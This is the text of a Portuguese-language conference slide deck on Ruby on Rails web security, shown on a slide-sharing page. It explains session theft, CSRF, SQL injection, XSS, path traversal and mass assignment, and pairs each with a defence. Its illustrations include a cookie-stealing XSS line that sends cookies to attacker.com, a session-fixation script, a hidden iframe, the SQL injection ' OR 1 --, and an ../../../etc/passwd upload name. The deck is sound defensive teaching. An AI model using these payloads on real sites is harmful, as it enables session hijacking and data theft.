Segurança & Ruby on Rails

Julio Monteiro
Julio MonteiroSoftware Engineer
Segurança &
Ruby on Rails

 http://julio.monteiro.eti.br
whoami
Joinville, SC
CCT, UDESC
Segurança & Ruby on Rails
Sessões
Sessões

• HTTP é um protocolo stateless
• Sessão é identificada por um cookie
  (contendo uma identificação e um hash)
• Enviado do servidor para o cliente, e do
  cliente para o servidor
Segurança & Ruby on Rails
Roubo de Sessão
Roubo de Sessão


• Roubo de um arquivo de cookie por um
  “atacante”
• Permite que o atacante aja em nome da vítima
Como uma sessão pode ser
         roubada?
       Roubo            Como combater?

Sniffers em uma rede       SSL (https)


Utilizar computadores    Botão “logout”,
       “públicos”        expirar sessão

  Session Fixation       (mais adiante)

        XSS              (mais adiante)
Dica:


Nunca armazene objetos
grandes em uma sessão.
Dica:

    Nunca armazene
informações críticas
    em uma sessão.
Como uma sessão é
  armazenada?
Como uma sessão é
   armazenada?

• ActiveRecordStore: armazena no
  banco de dados (tabela “sessions”)
• CookieStore: armazena em um cookie
  do usuário
Segurança & Ruby on Rails
Replay Attack no
 CookieStore
Replay Attack no
          CookieStore
1. Usuário ativa um cupom de presente na sua loja
   online, ficando com R$50 de crédito (armazenado
   na sessão)
2. Usuário compra algo custando R$40
3. Sessão agora armazena que usuário tem R$10
4. Usuário sobreescreve a sessão atual pela sessão
   inicial, ficando com R$50 novamente
Session Fixation
Session Fixation

                <script>
document.cookie="_session_id=16d5b78abb
       28e3d6206b60f22a03c8d9";
               </script>
Session Fixation
Como combater
 Session Fixation?

Utilize reset_session ao realizar login e/ou
 armazenar algo do usuário (como IP ou
                navegador).
Expirando sessões
Expirando sessões


• Expire-as de tempo em tempo (com base
  no updated_at e no created_at)
• Um simples rake no crontab já resolve
CSRF
CSRF

• Cross-Site Request Forgery
• Trata-se de aproveitar da sessão de um
  usuário, forçando-o (muitas vezes sem
  saber) a realizar determinada ação
CSRF
Como combater CSRF?


 Utilize os métodos HTTP da maneira correta
   (GET e POST, obrigatoriamente; e PUT e
             DELETE se possível)
Segurança & Ruby on Rails
Segurança & Ruby on Rails
Como combater CSRF?

• Utilize os métodos HTTP da maneira
  correta (GET e POST, obrigatoriamente; e
  PUT e DELETE se possível)
• Utilize um token
Como combater CSRF?

• Utilize os métodos HTTP da maneira
  correta (GET e POST, obrigatoriamente; e
  PUT e DELETE se possível)
• Utilize um token
Injeção em
Redirecionamentos
Injeção em
Redirecionamentos

http://www.example.com/site/legacy?
      param1=xy&param2=23&
    host=www.attacker.com
Como combater injeções
em Redirecionamentos?


    Não aceite URLs (ou partes dela)
           como parâmetro.
Uploads de arquivos
Uploads de arquivos
•   Algumas (várias?) aplicações aceitam
    uploads, recebendo um arquivo e um nome
    de arquivo.
•    Se você armazena os arquivos em /var/
    www/uploads, imagine se alguém fizer
    upload de um arquivo chamado
    ../../../etc/passwd ?
Como combater uploads
     maliciosos?


  Evite receber o nome do arquivo, ou crie um
          filtro com expressão regular.
DoS por uploads
DoS por uploads

•    Se seu site processa arquivos (como
    imagens, gerando miniaturas), nunca faça-o
    sincronamente.
•    Imagine alguém enviando milhares de
    arquivos ao mesmo tempo?
Como combater DoS
   por uploads?

Processe arquivos assincronamente (em um
daemon ou em um cron); se possível, até em
         uma máquina separada.
Upload de executáveis
Upload de executáveis

• Você terá problemas se armazenar seus
  arquivos em algum local "autorizado" a
  executar executáveis (como .CGI no
  Apache Document Directory do seu Virtual
  Host)
Como combater DoS
   por uploads?

Simplesmente tenha certeza que seu servidor
 web não está executando arquivos naquele
                 diretório.
Downloads não
 autorizados
Downloads não
       autorizados

• Evite que os usuários "escolham" o que
  querem baixar, como em:
Downloads não
       autorizados

• Evite que os usuários "escolham" o que
  querem baixar, como em:
Como combater downloads
   não autorizados?
Como combater downloads
   não autorizados?




    Opcionalmente, armazene o nome do
  arquivo no banco de dados, identificando-
     o para o usuário através de um id.
Mass Assignment
Mass Assignment


• Você sabia que o "script/generate scaffold"
  não gera o código mais completo e seguro
  do mundo? :)
Mass Assignment
Mass Assignment




 http://www.example.com/user/signup?
user[user]=ow3ned&user[admin]=1
Como combater aproveitamentos
    do mass assignment?
Como combater aproveitamentos
    do mass assignment?




       Modo paranóico:
Força bruta no
login do usuário
Como combater ataque
   de força bruta?

  CAPTCH depois de determinadas tentativas
             falhas de login.
 Utilize uma mensagem de erro genérica, como
 “usuário OU senha inválido, tente novamente”.
Hijacks diversos
Hijacks diversos

• Senhas: requira que o usuário digite a antiga
  senha para conseguir mudar.
Hijacks diversos

• Senhas: requira que o usuário digite a antiga
  senha para conseguir mudar.
• Email: requira que o usuário digite a antiga
  senha para conseguir mudar
Hijacks diversos

• Senhas: requira que o usuário digite a antiga
  senha para conseguir mudar.
• Email: requira que o usuário digite a antiga
  senha para conseguir mudar
• Outros: lembra do “problema” do GMail?
CAPTCHA
CAPTCHA negativo
Informações sensíveis
       no Log
Como combater
informações sensíveis no log?
Expressões regulares
Expressões regulares
Expressões regulares
Como combater aproveitamento
   de expressões regulares?



         Use A ao invés de ^
         Use Z ao invés de $
Escalação de privilégios
Escalação de privilégios


   http://www.example.com/projects/1
Escalação de privilégios
Como combater aproveitamento
   de expressões regulares?
Whitelist > Blacklist
Whitelist rula!
• before_filter :only => [...] ao invés de
  before_filter :except => [...]
• attr_accessible ao invés de attr_protected
• Permita somente <strong> ao invés de
  remover <script>
Injeção SQL
Injeção SQL



                   ' OR 1 --

SELECT * FROM projects WHERE name = '' OR 1 --'
Como combater
 injeções SQL?
XSS
XSS
• Cross Site Scripting
• Atualmente é o tipo de ataque mais comum,
  segundo a Symantec Global Internet Security
  Threat Report.
• Mais de 510.000 sites tiveram este tipo de
  ataque só em abril de 2008.
• Diversas ferramentas para auxiliar estes
  ataques, como o MPack.
XSS: Injeção JavaScript
XSS: Injeção JavaScript

       <script>alert('Hello');</script>


<table background="javascript:alert('Hello')">
XSS: Roubo de Cookie
XSS: Roubo de Cookie

 <script>document.write(document.cookie);</script>


     <script>document.write('<img src="http://
www.attacker.com/' + document.cookie + '">');</script>
XSS: Defacement
XSS: Defacement


<iframe name=”StatPage” src="http://58.xx.xxx.xxx"
 width=5 height=5 style=”display:none”></iframe>
Como combater estes
   ataques XSS?
Limpe a “entrada” do usuário com o método
                sanatize.


     Limpe a “saída” (impressão) com
 escapeHTML(), também chamado de h().
         <%=h @user.name %>
XSS: Injeção CSS
XSS: Injeção CSS


background:url('javascript:alert(1)')
Como combater estes
ataque XSS de injeção CSS?


       Evite CSS personalizado.
Dicas sobre a interface
    administrativa
Dicas sobre a interface
    administrativa
• Coloque-a em um subdomínio distinto,
  como admin.campusparty.com.br. Isso evita
  truques com Cookies.
• Se possível, limite o acesso administrativo a
  um número restritos de IP (ou a uma faixa).
• Que tal uma senha especial para ações
  importantes, como deletar usuários?
http://www.pragprog.com
http://www.rorsecurity.info
http://guias.rubyonrails.pro.br/
Segurança &
Ruby on Rails

 http://julio.monteiro.eti.br
1 of 96

Recommended

Presentta: usando Node.js na prática by
Presentta: usando Node.js na práticaPresentta: usando Node.js na prática
Presentta: usando Node.js na práticaNando Vieira
2.2K views38 slides
Autenticacao em APIs com SSL by
Autenticacao em APIs com SSLAutenticacao em APIs com SSL
Autenticacao em APIs com SSLMarcelo Milhomem
630 views38 slides
Construindo uma Aplicação PHP à Prova de Balas - 2010 by
Construindo uma Aplicação PHP à Prova de Balas - 2010Construindo uma Aplicação PHP à Prova de Balas - 2010
Construindo uma Aplicação PHP à Prova de Balas - 2010Rafael Jaques
4.9K views87 slides
A explosão do Node.js: JavaScript é o novo preto by
A explosão do Node.js: JavaScript é o novo pretoA explosão do Node.js: JavaScript é o novo preto
A explosão do Node.js: JavaScript é o novo pretoNando Vieira
1.1K views47 slides
XSS Desvendado by
XSS DesvendadoXSS Desvendado
XSS Desvendadoricardophp
888 views37 slides
Xss Desvendado! by
Xss Desvendado!Xss Desvendado!
Xss Desvendado!ricardophp
2K views14 slides

More Related Content

What's hot

Principais ameças à Aplicações Web - Como explorá-las e como se proteger. by
Principais ameças à Aplicações Web - Como explorá-las e como se proteger. Principais ameças à Aplicações Web - Como explorá-las e como se proteger.
Principais ameças à Aplicações Web - Como explorá-las e como se proteger. Clavis Segurança da Informação
1.4K views47 slides
WordPress Braga Meetup - Segurança, Performance e Optimização by
WordPress Braga Meetup - Segurança, Performance e OptimizaçãoWordPress Braga Meetup - Segurança, Performance e Optimização
WordPress Braga Meetup - Segurança, Performance e OptimizaçãoTeotonio Leiras
831 views28 slides
Segurança em Home Page by
Segurança em Home PageSegurança em Home Page
Segurança em Home Pageelliando dias
493 views20 slides
Aprendendo a criar plugins para o Wordpress - Richard Barros by
Aprendendo a criar plugins para o Wordpress - Richard BarrosAprendendo a criar plugins para o Wordpress - Richard Barros
Aprendendo a criar plugins para o Wordpress - Richard BarrosRichard Barros
971 views47 slides
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ... by
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...Magno Logan
429 views42 slides
Segurança Web: O MMA da Tecnologia by
Segurança Web: O MMA da TecnologiaSegurança Web: O MMA da Tecnologia
Segurança Web: O MMA da TecnologiaCarlos Nilton Araújo Corrêa
364 views27 slides

What's hot(7)

WordPress Braga Meetup - Segurança, Performance e Optimização by Teotonio Leiras
WordPress Braga Meetup - Segurança, Performance e OptimizaçãoWordPress Braga Meetup - Segurança, Performance e Optimização
WordPress Braga Meetup - Segurança, Performance e Optimização
Teotonio Leiras831 views
Aprendendo a criar plugins para o Wordpress - Richard Barros by Richard Barros
Aprendendo a criar plugins para o Wordpress - Richard BarrosAprendendo a criar plugins para o Wordpress - Richard Barros
Aprendendo a criar plugins para o Wordpress - Richard Barros
Richard Barros971 views
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ... by Magno Logan
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
Magno Logan429 views

Viewers also liked

Mercado de TI by
Mercado de TIMercado de TI
Mercado de TIMaurício Linhares
1.3K views33 slides
Introdução ao Ruby on Rails (SOCIESC) by
Introdução ao Ruby on Rails (SOCIESC)Introdução ao Ruby on Rails (SOCIESC)
Introdução ao Ruby on Rails (SOCIESC)Julio Monteiro
893 views30 slides
Ruby, Rails e Diversão (Campus Party Brasil 2009) by
Ruby, Rails e Diversão (Campus Party Brasil 2009)Ruby, Rails e Diversão (Campus Party Brasil 2009)
Ruby, Rails e Diversão (Campus Party Brasil 2009)Julio Monteiro
780 views99 slides
Curso de Ruby on Rails - Aula 02 by
Curso de Ruby on Rails - Aula 02Curso de Ruby on Rails - Aula 02
Curso de Ruby on Rails - Aula 02Maurício Linhares
1.3K views35 slides
Como colaborar com projetos opensource com o GitHub by
Como colaborar com projetos opensource com o GitHubComo colaborar com projetos opensource com o GitHub
Como colaborar com projetos opensource com o GitHubJulio Monteiro
2.6K views37 slides
Por que Ruby on Rails? by
Por que Ruby on Rails?Por que Ruby on Rails?
Por que Ruby on Rails?Julio Monteiro
1.6K views60 slides

Viewers also liked(6)

Introdução ao Ruby on Rails (SOCIESC) by Julio Monteiro
Introdução ao Ruby on Rails (SOCIESC)Introdução ao Ruby on Rails (SOCIESC)
Introdução ao Ruby on Rails (SOCIESC)
Julio Monteiro893 views
Ruby, Rails e Diversão (Campus Party Brasil 2009) by Julio Monteiro
Ruby, Rails e Diversão (Campus Party Brasil 2009)Ruby, Rails e Diversão (Campus Party Brasil 2009)
Ruby, Rails e Diversão (Campus Party Brasil 2009)
Julio Monteiro780 views
Como colaborar com projetos opensource com o GitHub by Julio Monteiro
Como colaborar com projetos opensource com o GitHubComo colaborar com projetos opensource com o GitHub
Como colaborar com projetos opensource com o GitHub
Julio Monteiro2.6K views

Similar to Segurança & Ruby on Rails

Segurança em Aplicativos Web by
Segurança em Aplicativos WebSegurança em Aplicativos Web
Segurança em Aplicativos WebSergio Henrique
964 views49 slides
Desenvolvendo sistemas seguros com PHP by
Desenvolvendo sistemas seguros com PHPDesenvolvendo sistemas seguros com PHP
Desenvolvendo sistemas seguros com PHPFlavio Souza
1.1K views52 slides
Segurança em Aplicações Web by
Segurança em Aplicações WebSegurança em Aplicações Web
Segurança em Aplicações WebCassio Ramos
2.7K views24 slides
Segurança em Rails by
Segurança em RailsSegurança em Rails
Segurança em RailsJuan Maiz
606 views50 slides
Tutorial: Principais Vulnerabilidades em Aplicações Web – Rafael Soares Ferre... by
Tutorial: Principais Vulnerabilidades em Aplicações Web – Rafael Soares Ferre...Tutorial: Principais Vulnerabilidades em Aplicações Web – Rafael Soares Ferre...
Tutorial: Principais Vulnerabilidades em Aplicações Web – Rafael Soares Ferre...Clavis Segurança da Informação
7.8K views81 slides
Construindo uma Aplicação PHP à Prova de Balas by
Construindo uma Aplicação PHP à Prova de BalasConstruindo uma Aplicação PHP à Prova de Balas
Construindo uma Aplicação PHP à Prova de BalasRafael Jaques
7K views62 slides

Similar to Segurança & Ruby on Rails(20)

Desenvolvendo sistemas seguros com PHP by Flavio Souza
Desenvolvendo sistemas seguros com PHPDesenvolvendo sistemas seguros com PHP
Desenvolvendo sistemas seguros com PHP
Flavio Souza1.1K views
Segurança em Aplicações Web by Cassio Ramos
Segurança em Aplicações WebSegurança em Aplicações Web
Segurança em Aplicações Web
Cassio Ramos2.7K views
Segurança em Rails by Juan Maiz
Segurança em RailsSegurança em Rails
Segurança em Rails
Juan Maiz606 views
Construindo uma Aplicação PHP à Prova de Balas by Rafael Jaques
Construindo uma Aplicação PHP à Prova de BalasConstruindo uma Aplicação PHP à Prova de Balas
Construindo uma Aplicação PHP à Prova de Balas
Rafael Jaques7K views
Construindo uma aplicação PHP à Prova de Balas - Rafael Jaques by Tchelinux
Construindo uma aplicação PHP à Prova de Balas - Rafael JaquesConstruindo uma aplicação PHP à Prova de Balas - Rafael Jaques
Construindo uma aplicação PHP à Prova de Balas - Rafael Jaques
Tchelinux949 views
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE by Magno Logan
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEEAppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
Magno Logan827 views
Desenvolvimento de Software Seguro by Augusto Lüdtke
Desenvolvimento de Software SeguroDesenvolvimento de Software Seguro
Desenvolvimento de Software Seguro
Augusto Lüdtke4.3K views
Apresentação Ismael Rocha e Fabricio Braz by OWASP Brasília
Apresentação Ismael Rocha e Fabricio BrazApresentação Ismael Rocha e Fabricio Braz
Apresentação Ismael Rocha e Fabricio Braz
OWASP Brasília910 views
Tony\'s Top 10 Computer Forensics Artifacts by tonyrodrigues
Tony\'s Top 10 Computer Forensics ArtifactsTony\'s Top 10 Computer Forensics Artifacts
Tony\'s Top 10 Computer Forensics Artifacts
tonyrodrigues425 views
Qualitypress - Segurança em Aplicações Web com PHP by Quality Press
Qualitypress - Segurança em Aplicações Web com PHPQualitypress - Segurança em Aplicações Web com PHP
Qualitypress - Segurança em Aplicações Web com PHP
Quality Press479 views

More from Julio Monteiro

MongoDB: um banco de dados orientado a documento by
MongoDB: um banco de dados orientado a documentoMongoDB: um banco de dados orientado a documento
MongoDB: um banco de dados orientado a documentoJulio Monteiro
2.3K views61 slides
Como criar e lançar um e-commerce em 42 minutos by
Como criar e lançar um e-commerce em 42 minutosComo criar e lançar um e-commerce em 42 minutos
Como criar e lançar um e-commerce em 42 minutosJulio Monteiro
2.3K views26 slides
MongoDB by
MongoDBMongoDB
MongoDBJulio Monteiro
2.5K views48 slides
Desenvolvimento Web com Rails by
Desenvolvimento Web com RailsDesenvolvimento Web com Rails
Desenvolvimento Web com RailsJulio Monteiro
911 views64 slides
Como criar e lançar um site em 42 minutos by
Como criar e lançar um site em 42 minutosComo criar e lançar um site em 42 minutos
Como criar e lançar um site em 42 minutosJulio Monteiro
1.9K views20 slides
Ubuntu Enterprise Cloud by
Ubuntu Enterprise CloudUbuntu Enterprise Cloud
Ubuntu Enterprise CloudJulio Monteiro
2K views27 slides

More from Julio Monteiro(9)

MongoDB: um banco de dados orientado a documento by Julio Monteiro
MongoDB: um banco de dados orientado a documentoMongoDB: um banco de dados orientado a documento
MongoDB: um banco de dados orientado a documento
Julio Monteiro2.3K views
Como criar e lançar um e-commerce em 42 minutos by Julio Monteiro
Como criar e lançar um e-commerce em 42 minutosComo criar e lançar um e-commerce em 42 minutos
Como criar e lançar um e-commerce em 42 minutos
Julio Monteiro2.3K views
Desenvolvimento Web com Rails by Julio Monteiro
Desenvolvimento Web com RailsDesenvolvimento Web com Rails
Desenvolvimento Web com Rails
Julio Monteiro911 views
Como criar e lançar um site em 42 minutos by Julio Monteiro
Como criar e lançar um site em 42 minutosComo criar e lançar um site em 42 minutos
Como criar e lançar um site em 42 minutos
Julio Monteiro1.9K views
Introdução ao Ruby on Rails (InstallFest 2006) by Julio Monteiro
Introdução ao Ruby on Rails (InstallFest 2006)Introdução ao Ruby on Rails (InstallFest 2006)
Introdução ao Ruby on Rails (InstallFest 2006)
Julio Monteiro1.1K views
Ruby on Rails e o Mercado by Julio Monteiro
Ruby on Rails e o MercadoRuby on Rails e o Mercado
Ruby on Rails e o Mercado
Julio Monteiro2.4K views

Recently uploaded

b. Selecione uma deficiência e apresente duas estratégias que podem potencial... by
b. Selecione uma deficiência e apresente duas estratégias que podem potencial...b. Selecione uma deficiência e apresente duas estratégias que podem potencial...
b. Selecione uma deficiência e apresente duas estratégias que podem potencial...azulassessoriaacadem3
39 views2 slides
b) Estime, com base no modelo obtido em (A), a massa de uma mulher de 160 cm. by
b) Estime, com base no modelo obtido em (A), a massa de uma mulher de 160 cm.b) Estime, com base no modelo obtido em (A), a massa de uma mulher de 160 cm.
b) Estime, com base no modelo obtido em (A), a massa de uma mulher de 160 cm.azulassessoriaacadem3
34 views2 slides
Etapa 3: - Definindo a localização da extremidade da sonda, ou seja, se vai f... by
Etapa 3: - Definindo a localização da extremidade da sonda, ou seja, se vai f...Etapa 3: - Definindo a localização da extremidade da sonda, ou seja, se vai f...
Etapa 3: - Definindo a localização da extremidade da sonda, ou seja, se vai f...azulassessoriaacadem3
20 views2 slides
Slides Lição 11, CPAD, Missões e a Igreja Perseguida.pptx by
Slides Lição 11, CPAD, Missões e a Igreja Perseguida.pptxSlides Lição 11, CPAD, Missões e a Igreja Perseguida.pptx
Slides Lição 11, CPAD, Missões e a Igreja Perseguida.pptxLuizHenriquedeAlmeid6
27 views61 slides
1) Elabore um MAPA CONCEITUAL sobre os estilos de aprendizagem. Você pode tan... by
1) Elabore um MAPA CONCEITUAL sobre os estilos de aprendizagem. Você pode tan...1) Elabore um MAPA CONCEITUAL sobre os estilos de aprendizagem. Você pode tan...
1) Elabore um MAPA CONCEITUAL sobre os estilos de aprendizagem. Você pode tan...azulassessoriaacadem3
11 views2 slides
a) ​DETERMINE quais as funções dos conceitos T1 e T2 e suas principais difere... by
a) ​DETERMINE quais as funções dos conceitos T1 e T2 e suas principais difere...a) ​DETERMINE quais as funções dos conceitos T1 e T2 e suas principais difere...
a) ​DETERMINE quais as funções dos conceitos T1 e T2 e suas principais difere...HelpEducacional
12 views2 slides

Recently uploaded(20)

b. Selecione uma deficiência e apresente duas estratégias que podem potencial... by azulassessoriaacadem3
b. Selecione uma deficiência e apresente duas estratégias que podem potencial...b. Selecione uma deficiência e apresente duas estratégias que podem potencial...
b. Selecione uma deficiência e apresente duas estratégias que podem potencial...
b) Estime, com base no modelo obtido em (A), a massa de uma mulher de 160 cm. by azulassessoriaacadem3
b) Estime, com base no modelo obtido em (A), a massa de uma mulher de 160 cm.b) Estime, com base no modelo obtido em (A), a massa de uma mulher de 160 cm.
b) Estime, com base no modelo obtido em (A), a massa de uma mulher de 160 cm.
Etapa 3: - Definindo a localização da extremidade da sonda, ou seja, se vai f... by azulassessoriaacadem3
Etapa 3: - Definindo a localização da extremidade da sonda, ou seja, se vai f...Etapa 3: - Definindo a localização da extremidade da sonda, ou seja, se vai f...
Etapa 3: - Definindo a localização da extremidade da sonda, ou seja, se vai f...
Slides Lição 11, CPAD, Missões e a Igreja Perseguida.pptx by LuizHenriquedeAlmeid6
Slides Lição 11, CPAD, Missões e a Igreja Perseguida.pptxSlides Lição 11, CPAD, Missões e a Igreja Perseguida.pptx
Slides Lição 11, CPAD, Missões e a Igreja Perseguida.pptx
1) Elabore um MAPA CONCEITUAL sobre os estilos de aprendizagem. Você pode tan... by azulassessoriaacadem3
1) Elabore um MAPA CONCEITUAL sobre os estilos de aprendizagem. Você pode tan...1) Elabore um MAPA CONCEITUAL sobre os estilos de aprendizagem. Você pode tan...
1) Elabore um MAPA CONCEITUAL sobre os estilos de aprendizagem. Você pode tan...
a) ​DETERMINE quais as funções dos conceitos T1 e T2 e suas principais difere... by HelpEducacional
a) ​DETERMINE quais as funções dos conceitos T1 e T2 e suas principais difere...a) ​DETERMINE quais as funções dos conceitos T1 e T2 e suas principais difere...
a) ​DETERMINE quais as funções dos conceitos T1 e T2 e suas principais difere...
HelpEducacional12 views
Considere o seguinte cenário: Um programador está realizando um trabalho para... by azulassessoriaacadem3
Considere o seguinte cenário: Um programador está realizando um trabalho para...Considere o seguinte cenário: Um programador está realizando um trabalho para...
Considere o seguinte cenário: Um programador está realizando um trabalho para...
Com seu entendimento sobre os processos, faça como Capote sugeriu, e descreva... by azulassessoriaacadem3
Com seu entendimento sobre os processos, faça como Capote sugeriu, e descreva...Com seu entendimento sobre os processos, faça como Capote sugeriu, e descreva...
Com seu entendimento sobre os processos, faça como Capote sugeriu, e descreva...
Base de Dados Scopus_20231124_220830_0000.pdf by PAULOAMARAL67705
Base de Dados Scopus_20231124_220830_0000.pdfBase de Dados Scopus_20231124_220830_0000.pdf
Base de Dados Scopus_20231124_220830_0000.pdf
PAULOAMARAL6770524 views
A confeitaria mistura técnica, arte e criatividade na elaboração dos inúmeros... by azulassessoriaacadem3
A confeitaria mistura técnica, arte e criatividade na elaboração dos inúmeros...A confeitaria mistura técnica, arte e criatividade na elaboração dos inúmeros...
A confeitaria mistura técnica, arte e criatividade na elaboração dos inúmeros...
ATIVIDADE PROPOSTA Considerando o exposto acima, elabore um texto dissertat... by azulassessoriaacadem3
ATIVIDADE PROPOSTA   Considerando o exposto acima, elabore um texto dissertat...ATIVIDADE PROPOSTA   Considerando o exposto acima, elabore um texto dissertat...
ATIVIDADE PROPOSTA Considerando o exposto acima, elabore um texto dissertat...
a) ​DETERMINE quais as funções dos conceitos T1 e T2 e suas principais difere... by HelpEducacional
a) ​DETERMINE quais as funções dos conceitos T1 e T2 e suas principais difere...a) ​DETERMINE quais as funções dos conceitos T1 e T2 e suas principais difere...
a) ​DETERMINE quais as funções dos conceitos T1 e T2 e suas principais difere...
HelpEducacional18 views
ATIVIDADE 1 - SSOC - FUNDAMENTOS TEÓRICO-FILOSÓFICOS DO SERVIÇO SOCIAL - 54/2... by assessoriaff06
ATIVIDADE 1 - SSOC - FUNDAMENTOS TEÓRICO-FILOSÓFICOS DO SERVIÇO SOCIAL - 54/2...ATIVIDADE 1 - SSOC - FUNDAMENTOS TEÓRICO-FILOSÓFICOS DO SERVIÇO SOCIAL - 54/2...
ATIVIDADE 1 - SSOC - FUNDAMENTOS TEÓRICO-FILOSÓFICOS DO SERVIÇO SOCIAL - 54/2...
assessoriaff0611 views
Questão 02. Sobre os direitos fundamentais. O texto menciona que o governo es... by azulassessoriaacadem3
Questão 02. Sobre os direitos fundamentais. O texto menciona que o governo es...Questão 02. Sobre os direitos fundamentais. O texto menciona que o governo es...
Questão 02. Sobre os direitos fundamentais. O texto menciona que o governo es...
Sobre essa temática, considere a seguinte situação hipotética: Breno Giord é ... by marcosvsoares
Sobre essa temática, considere a seguinte situação hipotética: Breno Giord é ...Sobre essa temática, considere a seguinte situação hipotética: Breno Giord é ...
Sobre essa temática, considere a seguinte situação hipotética: Breno Giord é ...
marcosvsoares15 views
4- Escrever na tela os setores que alcançaram a meta. by AzulAssessoria5
4- Escrever na tela os setores que alcançaram a meta.4- Escrever na tela os setores que alcançaram a meta.
4- Escrever na tela os setores que alcançaram a meta.
AzulAssessoria510 views
4. No vídeo “Cadela aprende libras para entender comando dos donos” foi apres... by IntegrareAcademy2
4. No vídeo “Cadela aprende libras para entender comando dos donos” foi apres...4. No vídeo “Cadela aprende libras para entender comando dos donos” foi apres...
4. No vídeo “Cadela aprende libras para entender comando dos donos” foi apres...
Slides Lição 11, Betel, O Verdadeiro Discípulo é uma referência no serviço cr... by LuizHenriquedeAlmeid6
Slides Lição 11, Betel, O Verdadeiro Discípulo é uma referência no serviço cr...Slides Lição 11, Betel, O Verdadeiro Discípulo é uma referência no serviço cr...
Slides Lição 11, Betel, O Verdadeiro Discípulo é uma referência no serviço cr...

Segurança & Ruby on Rails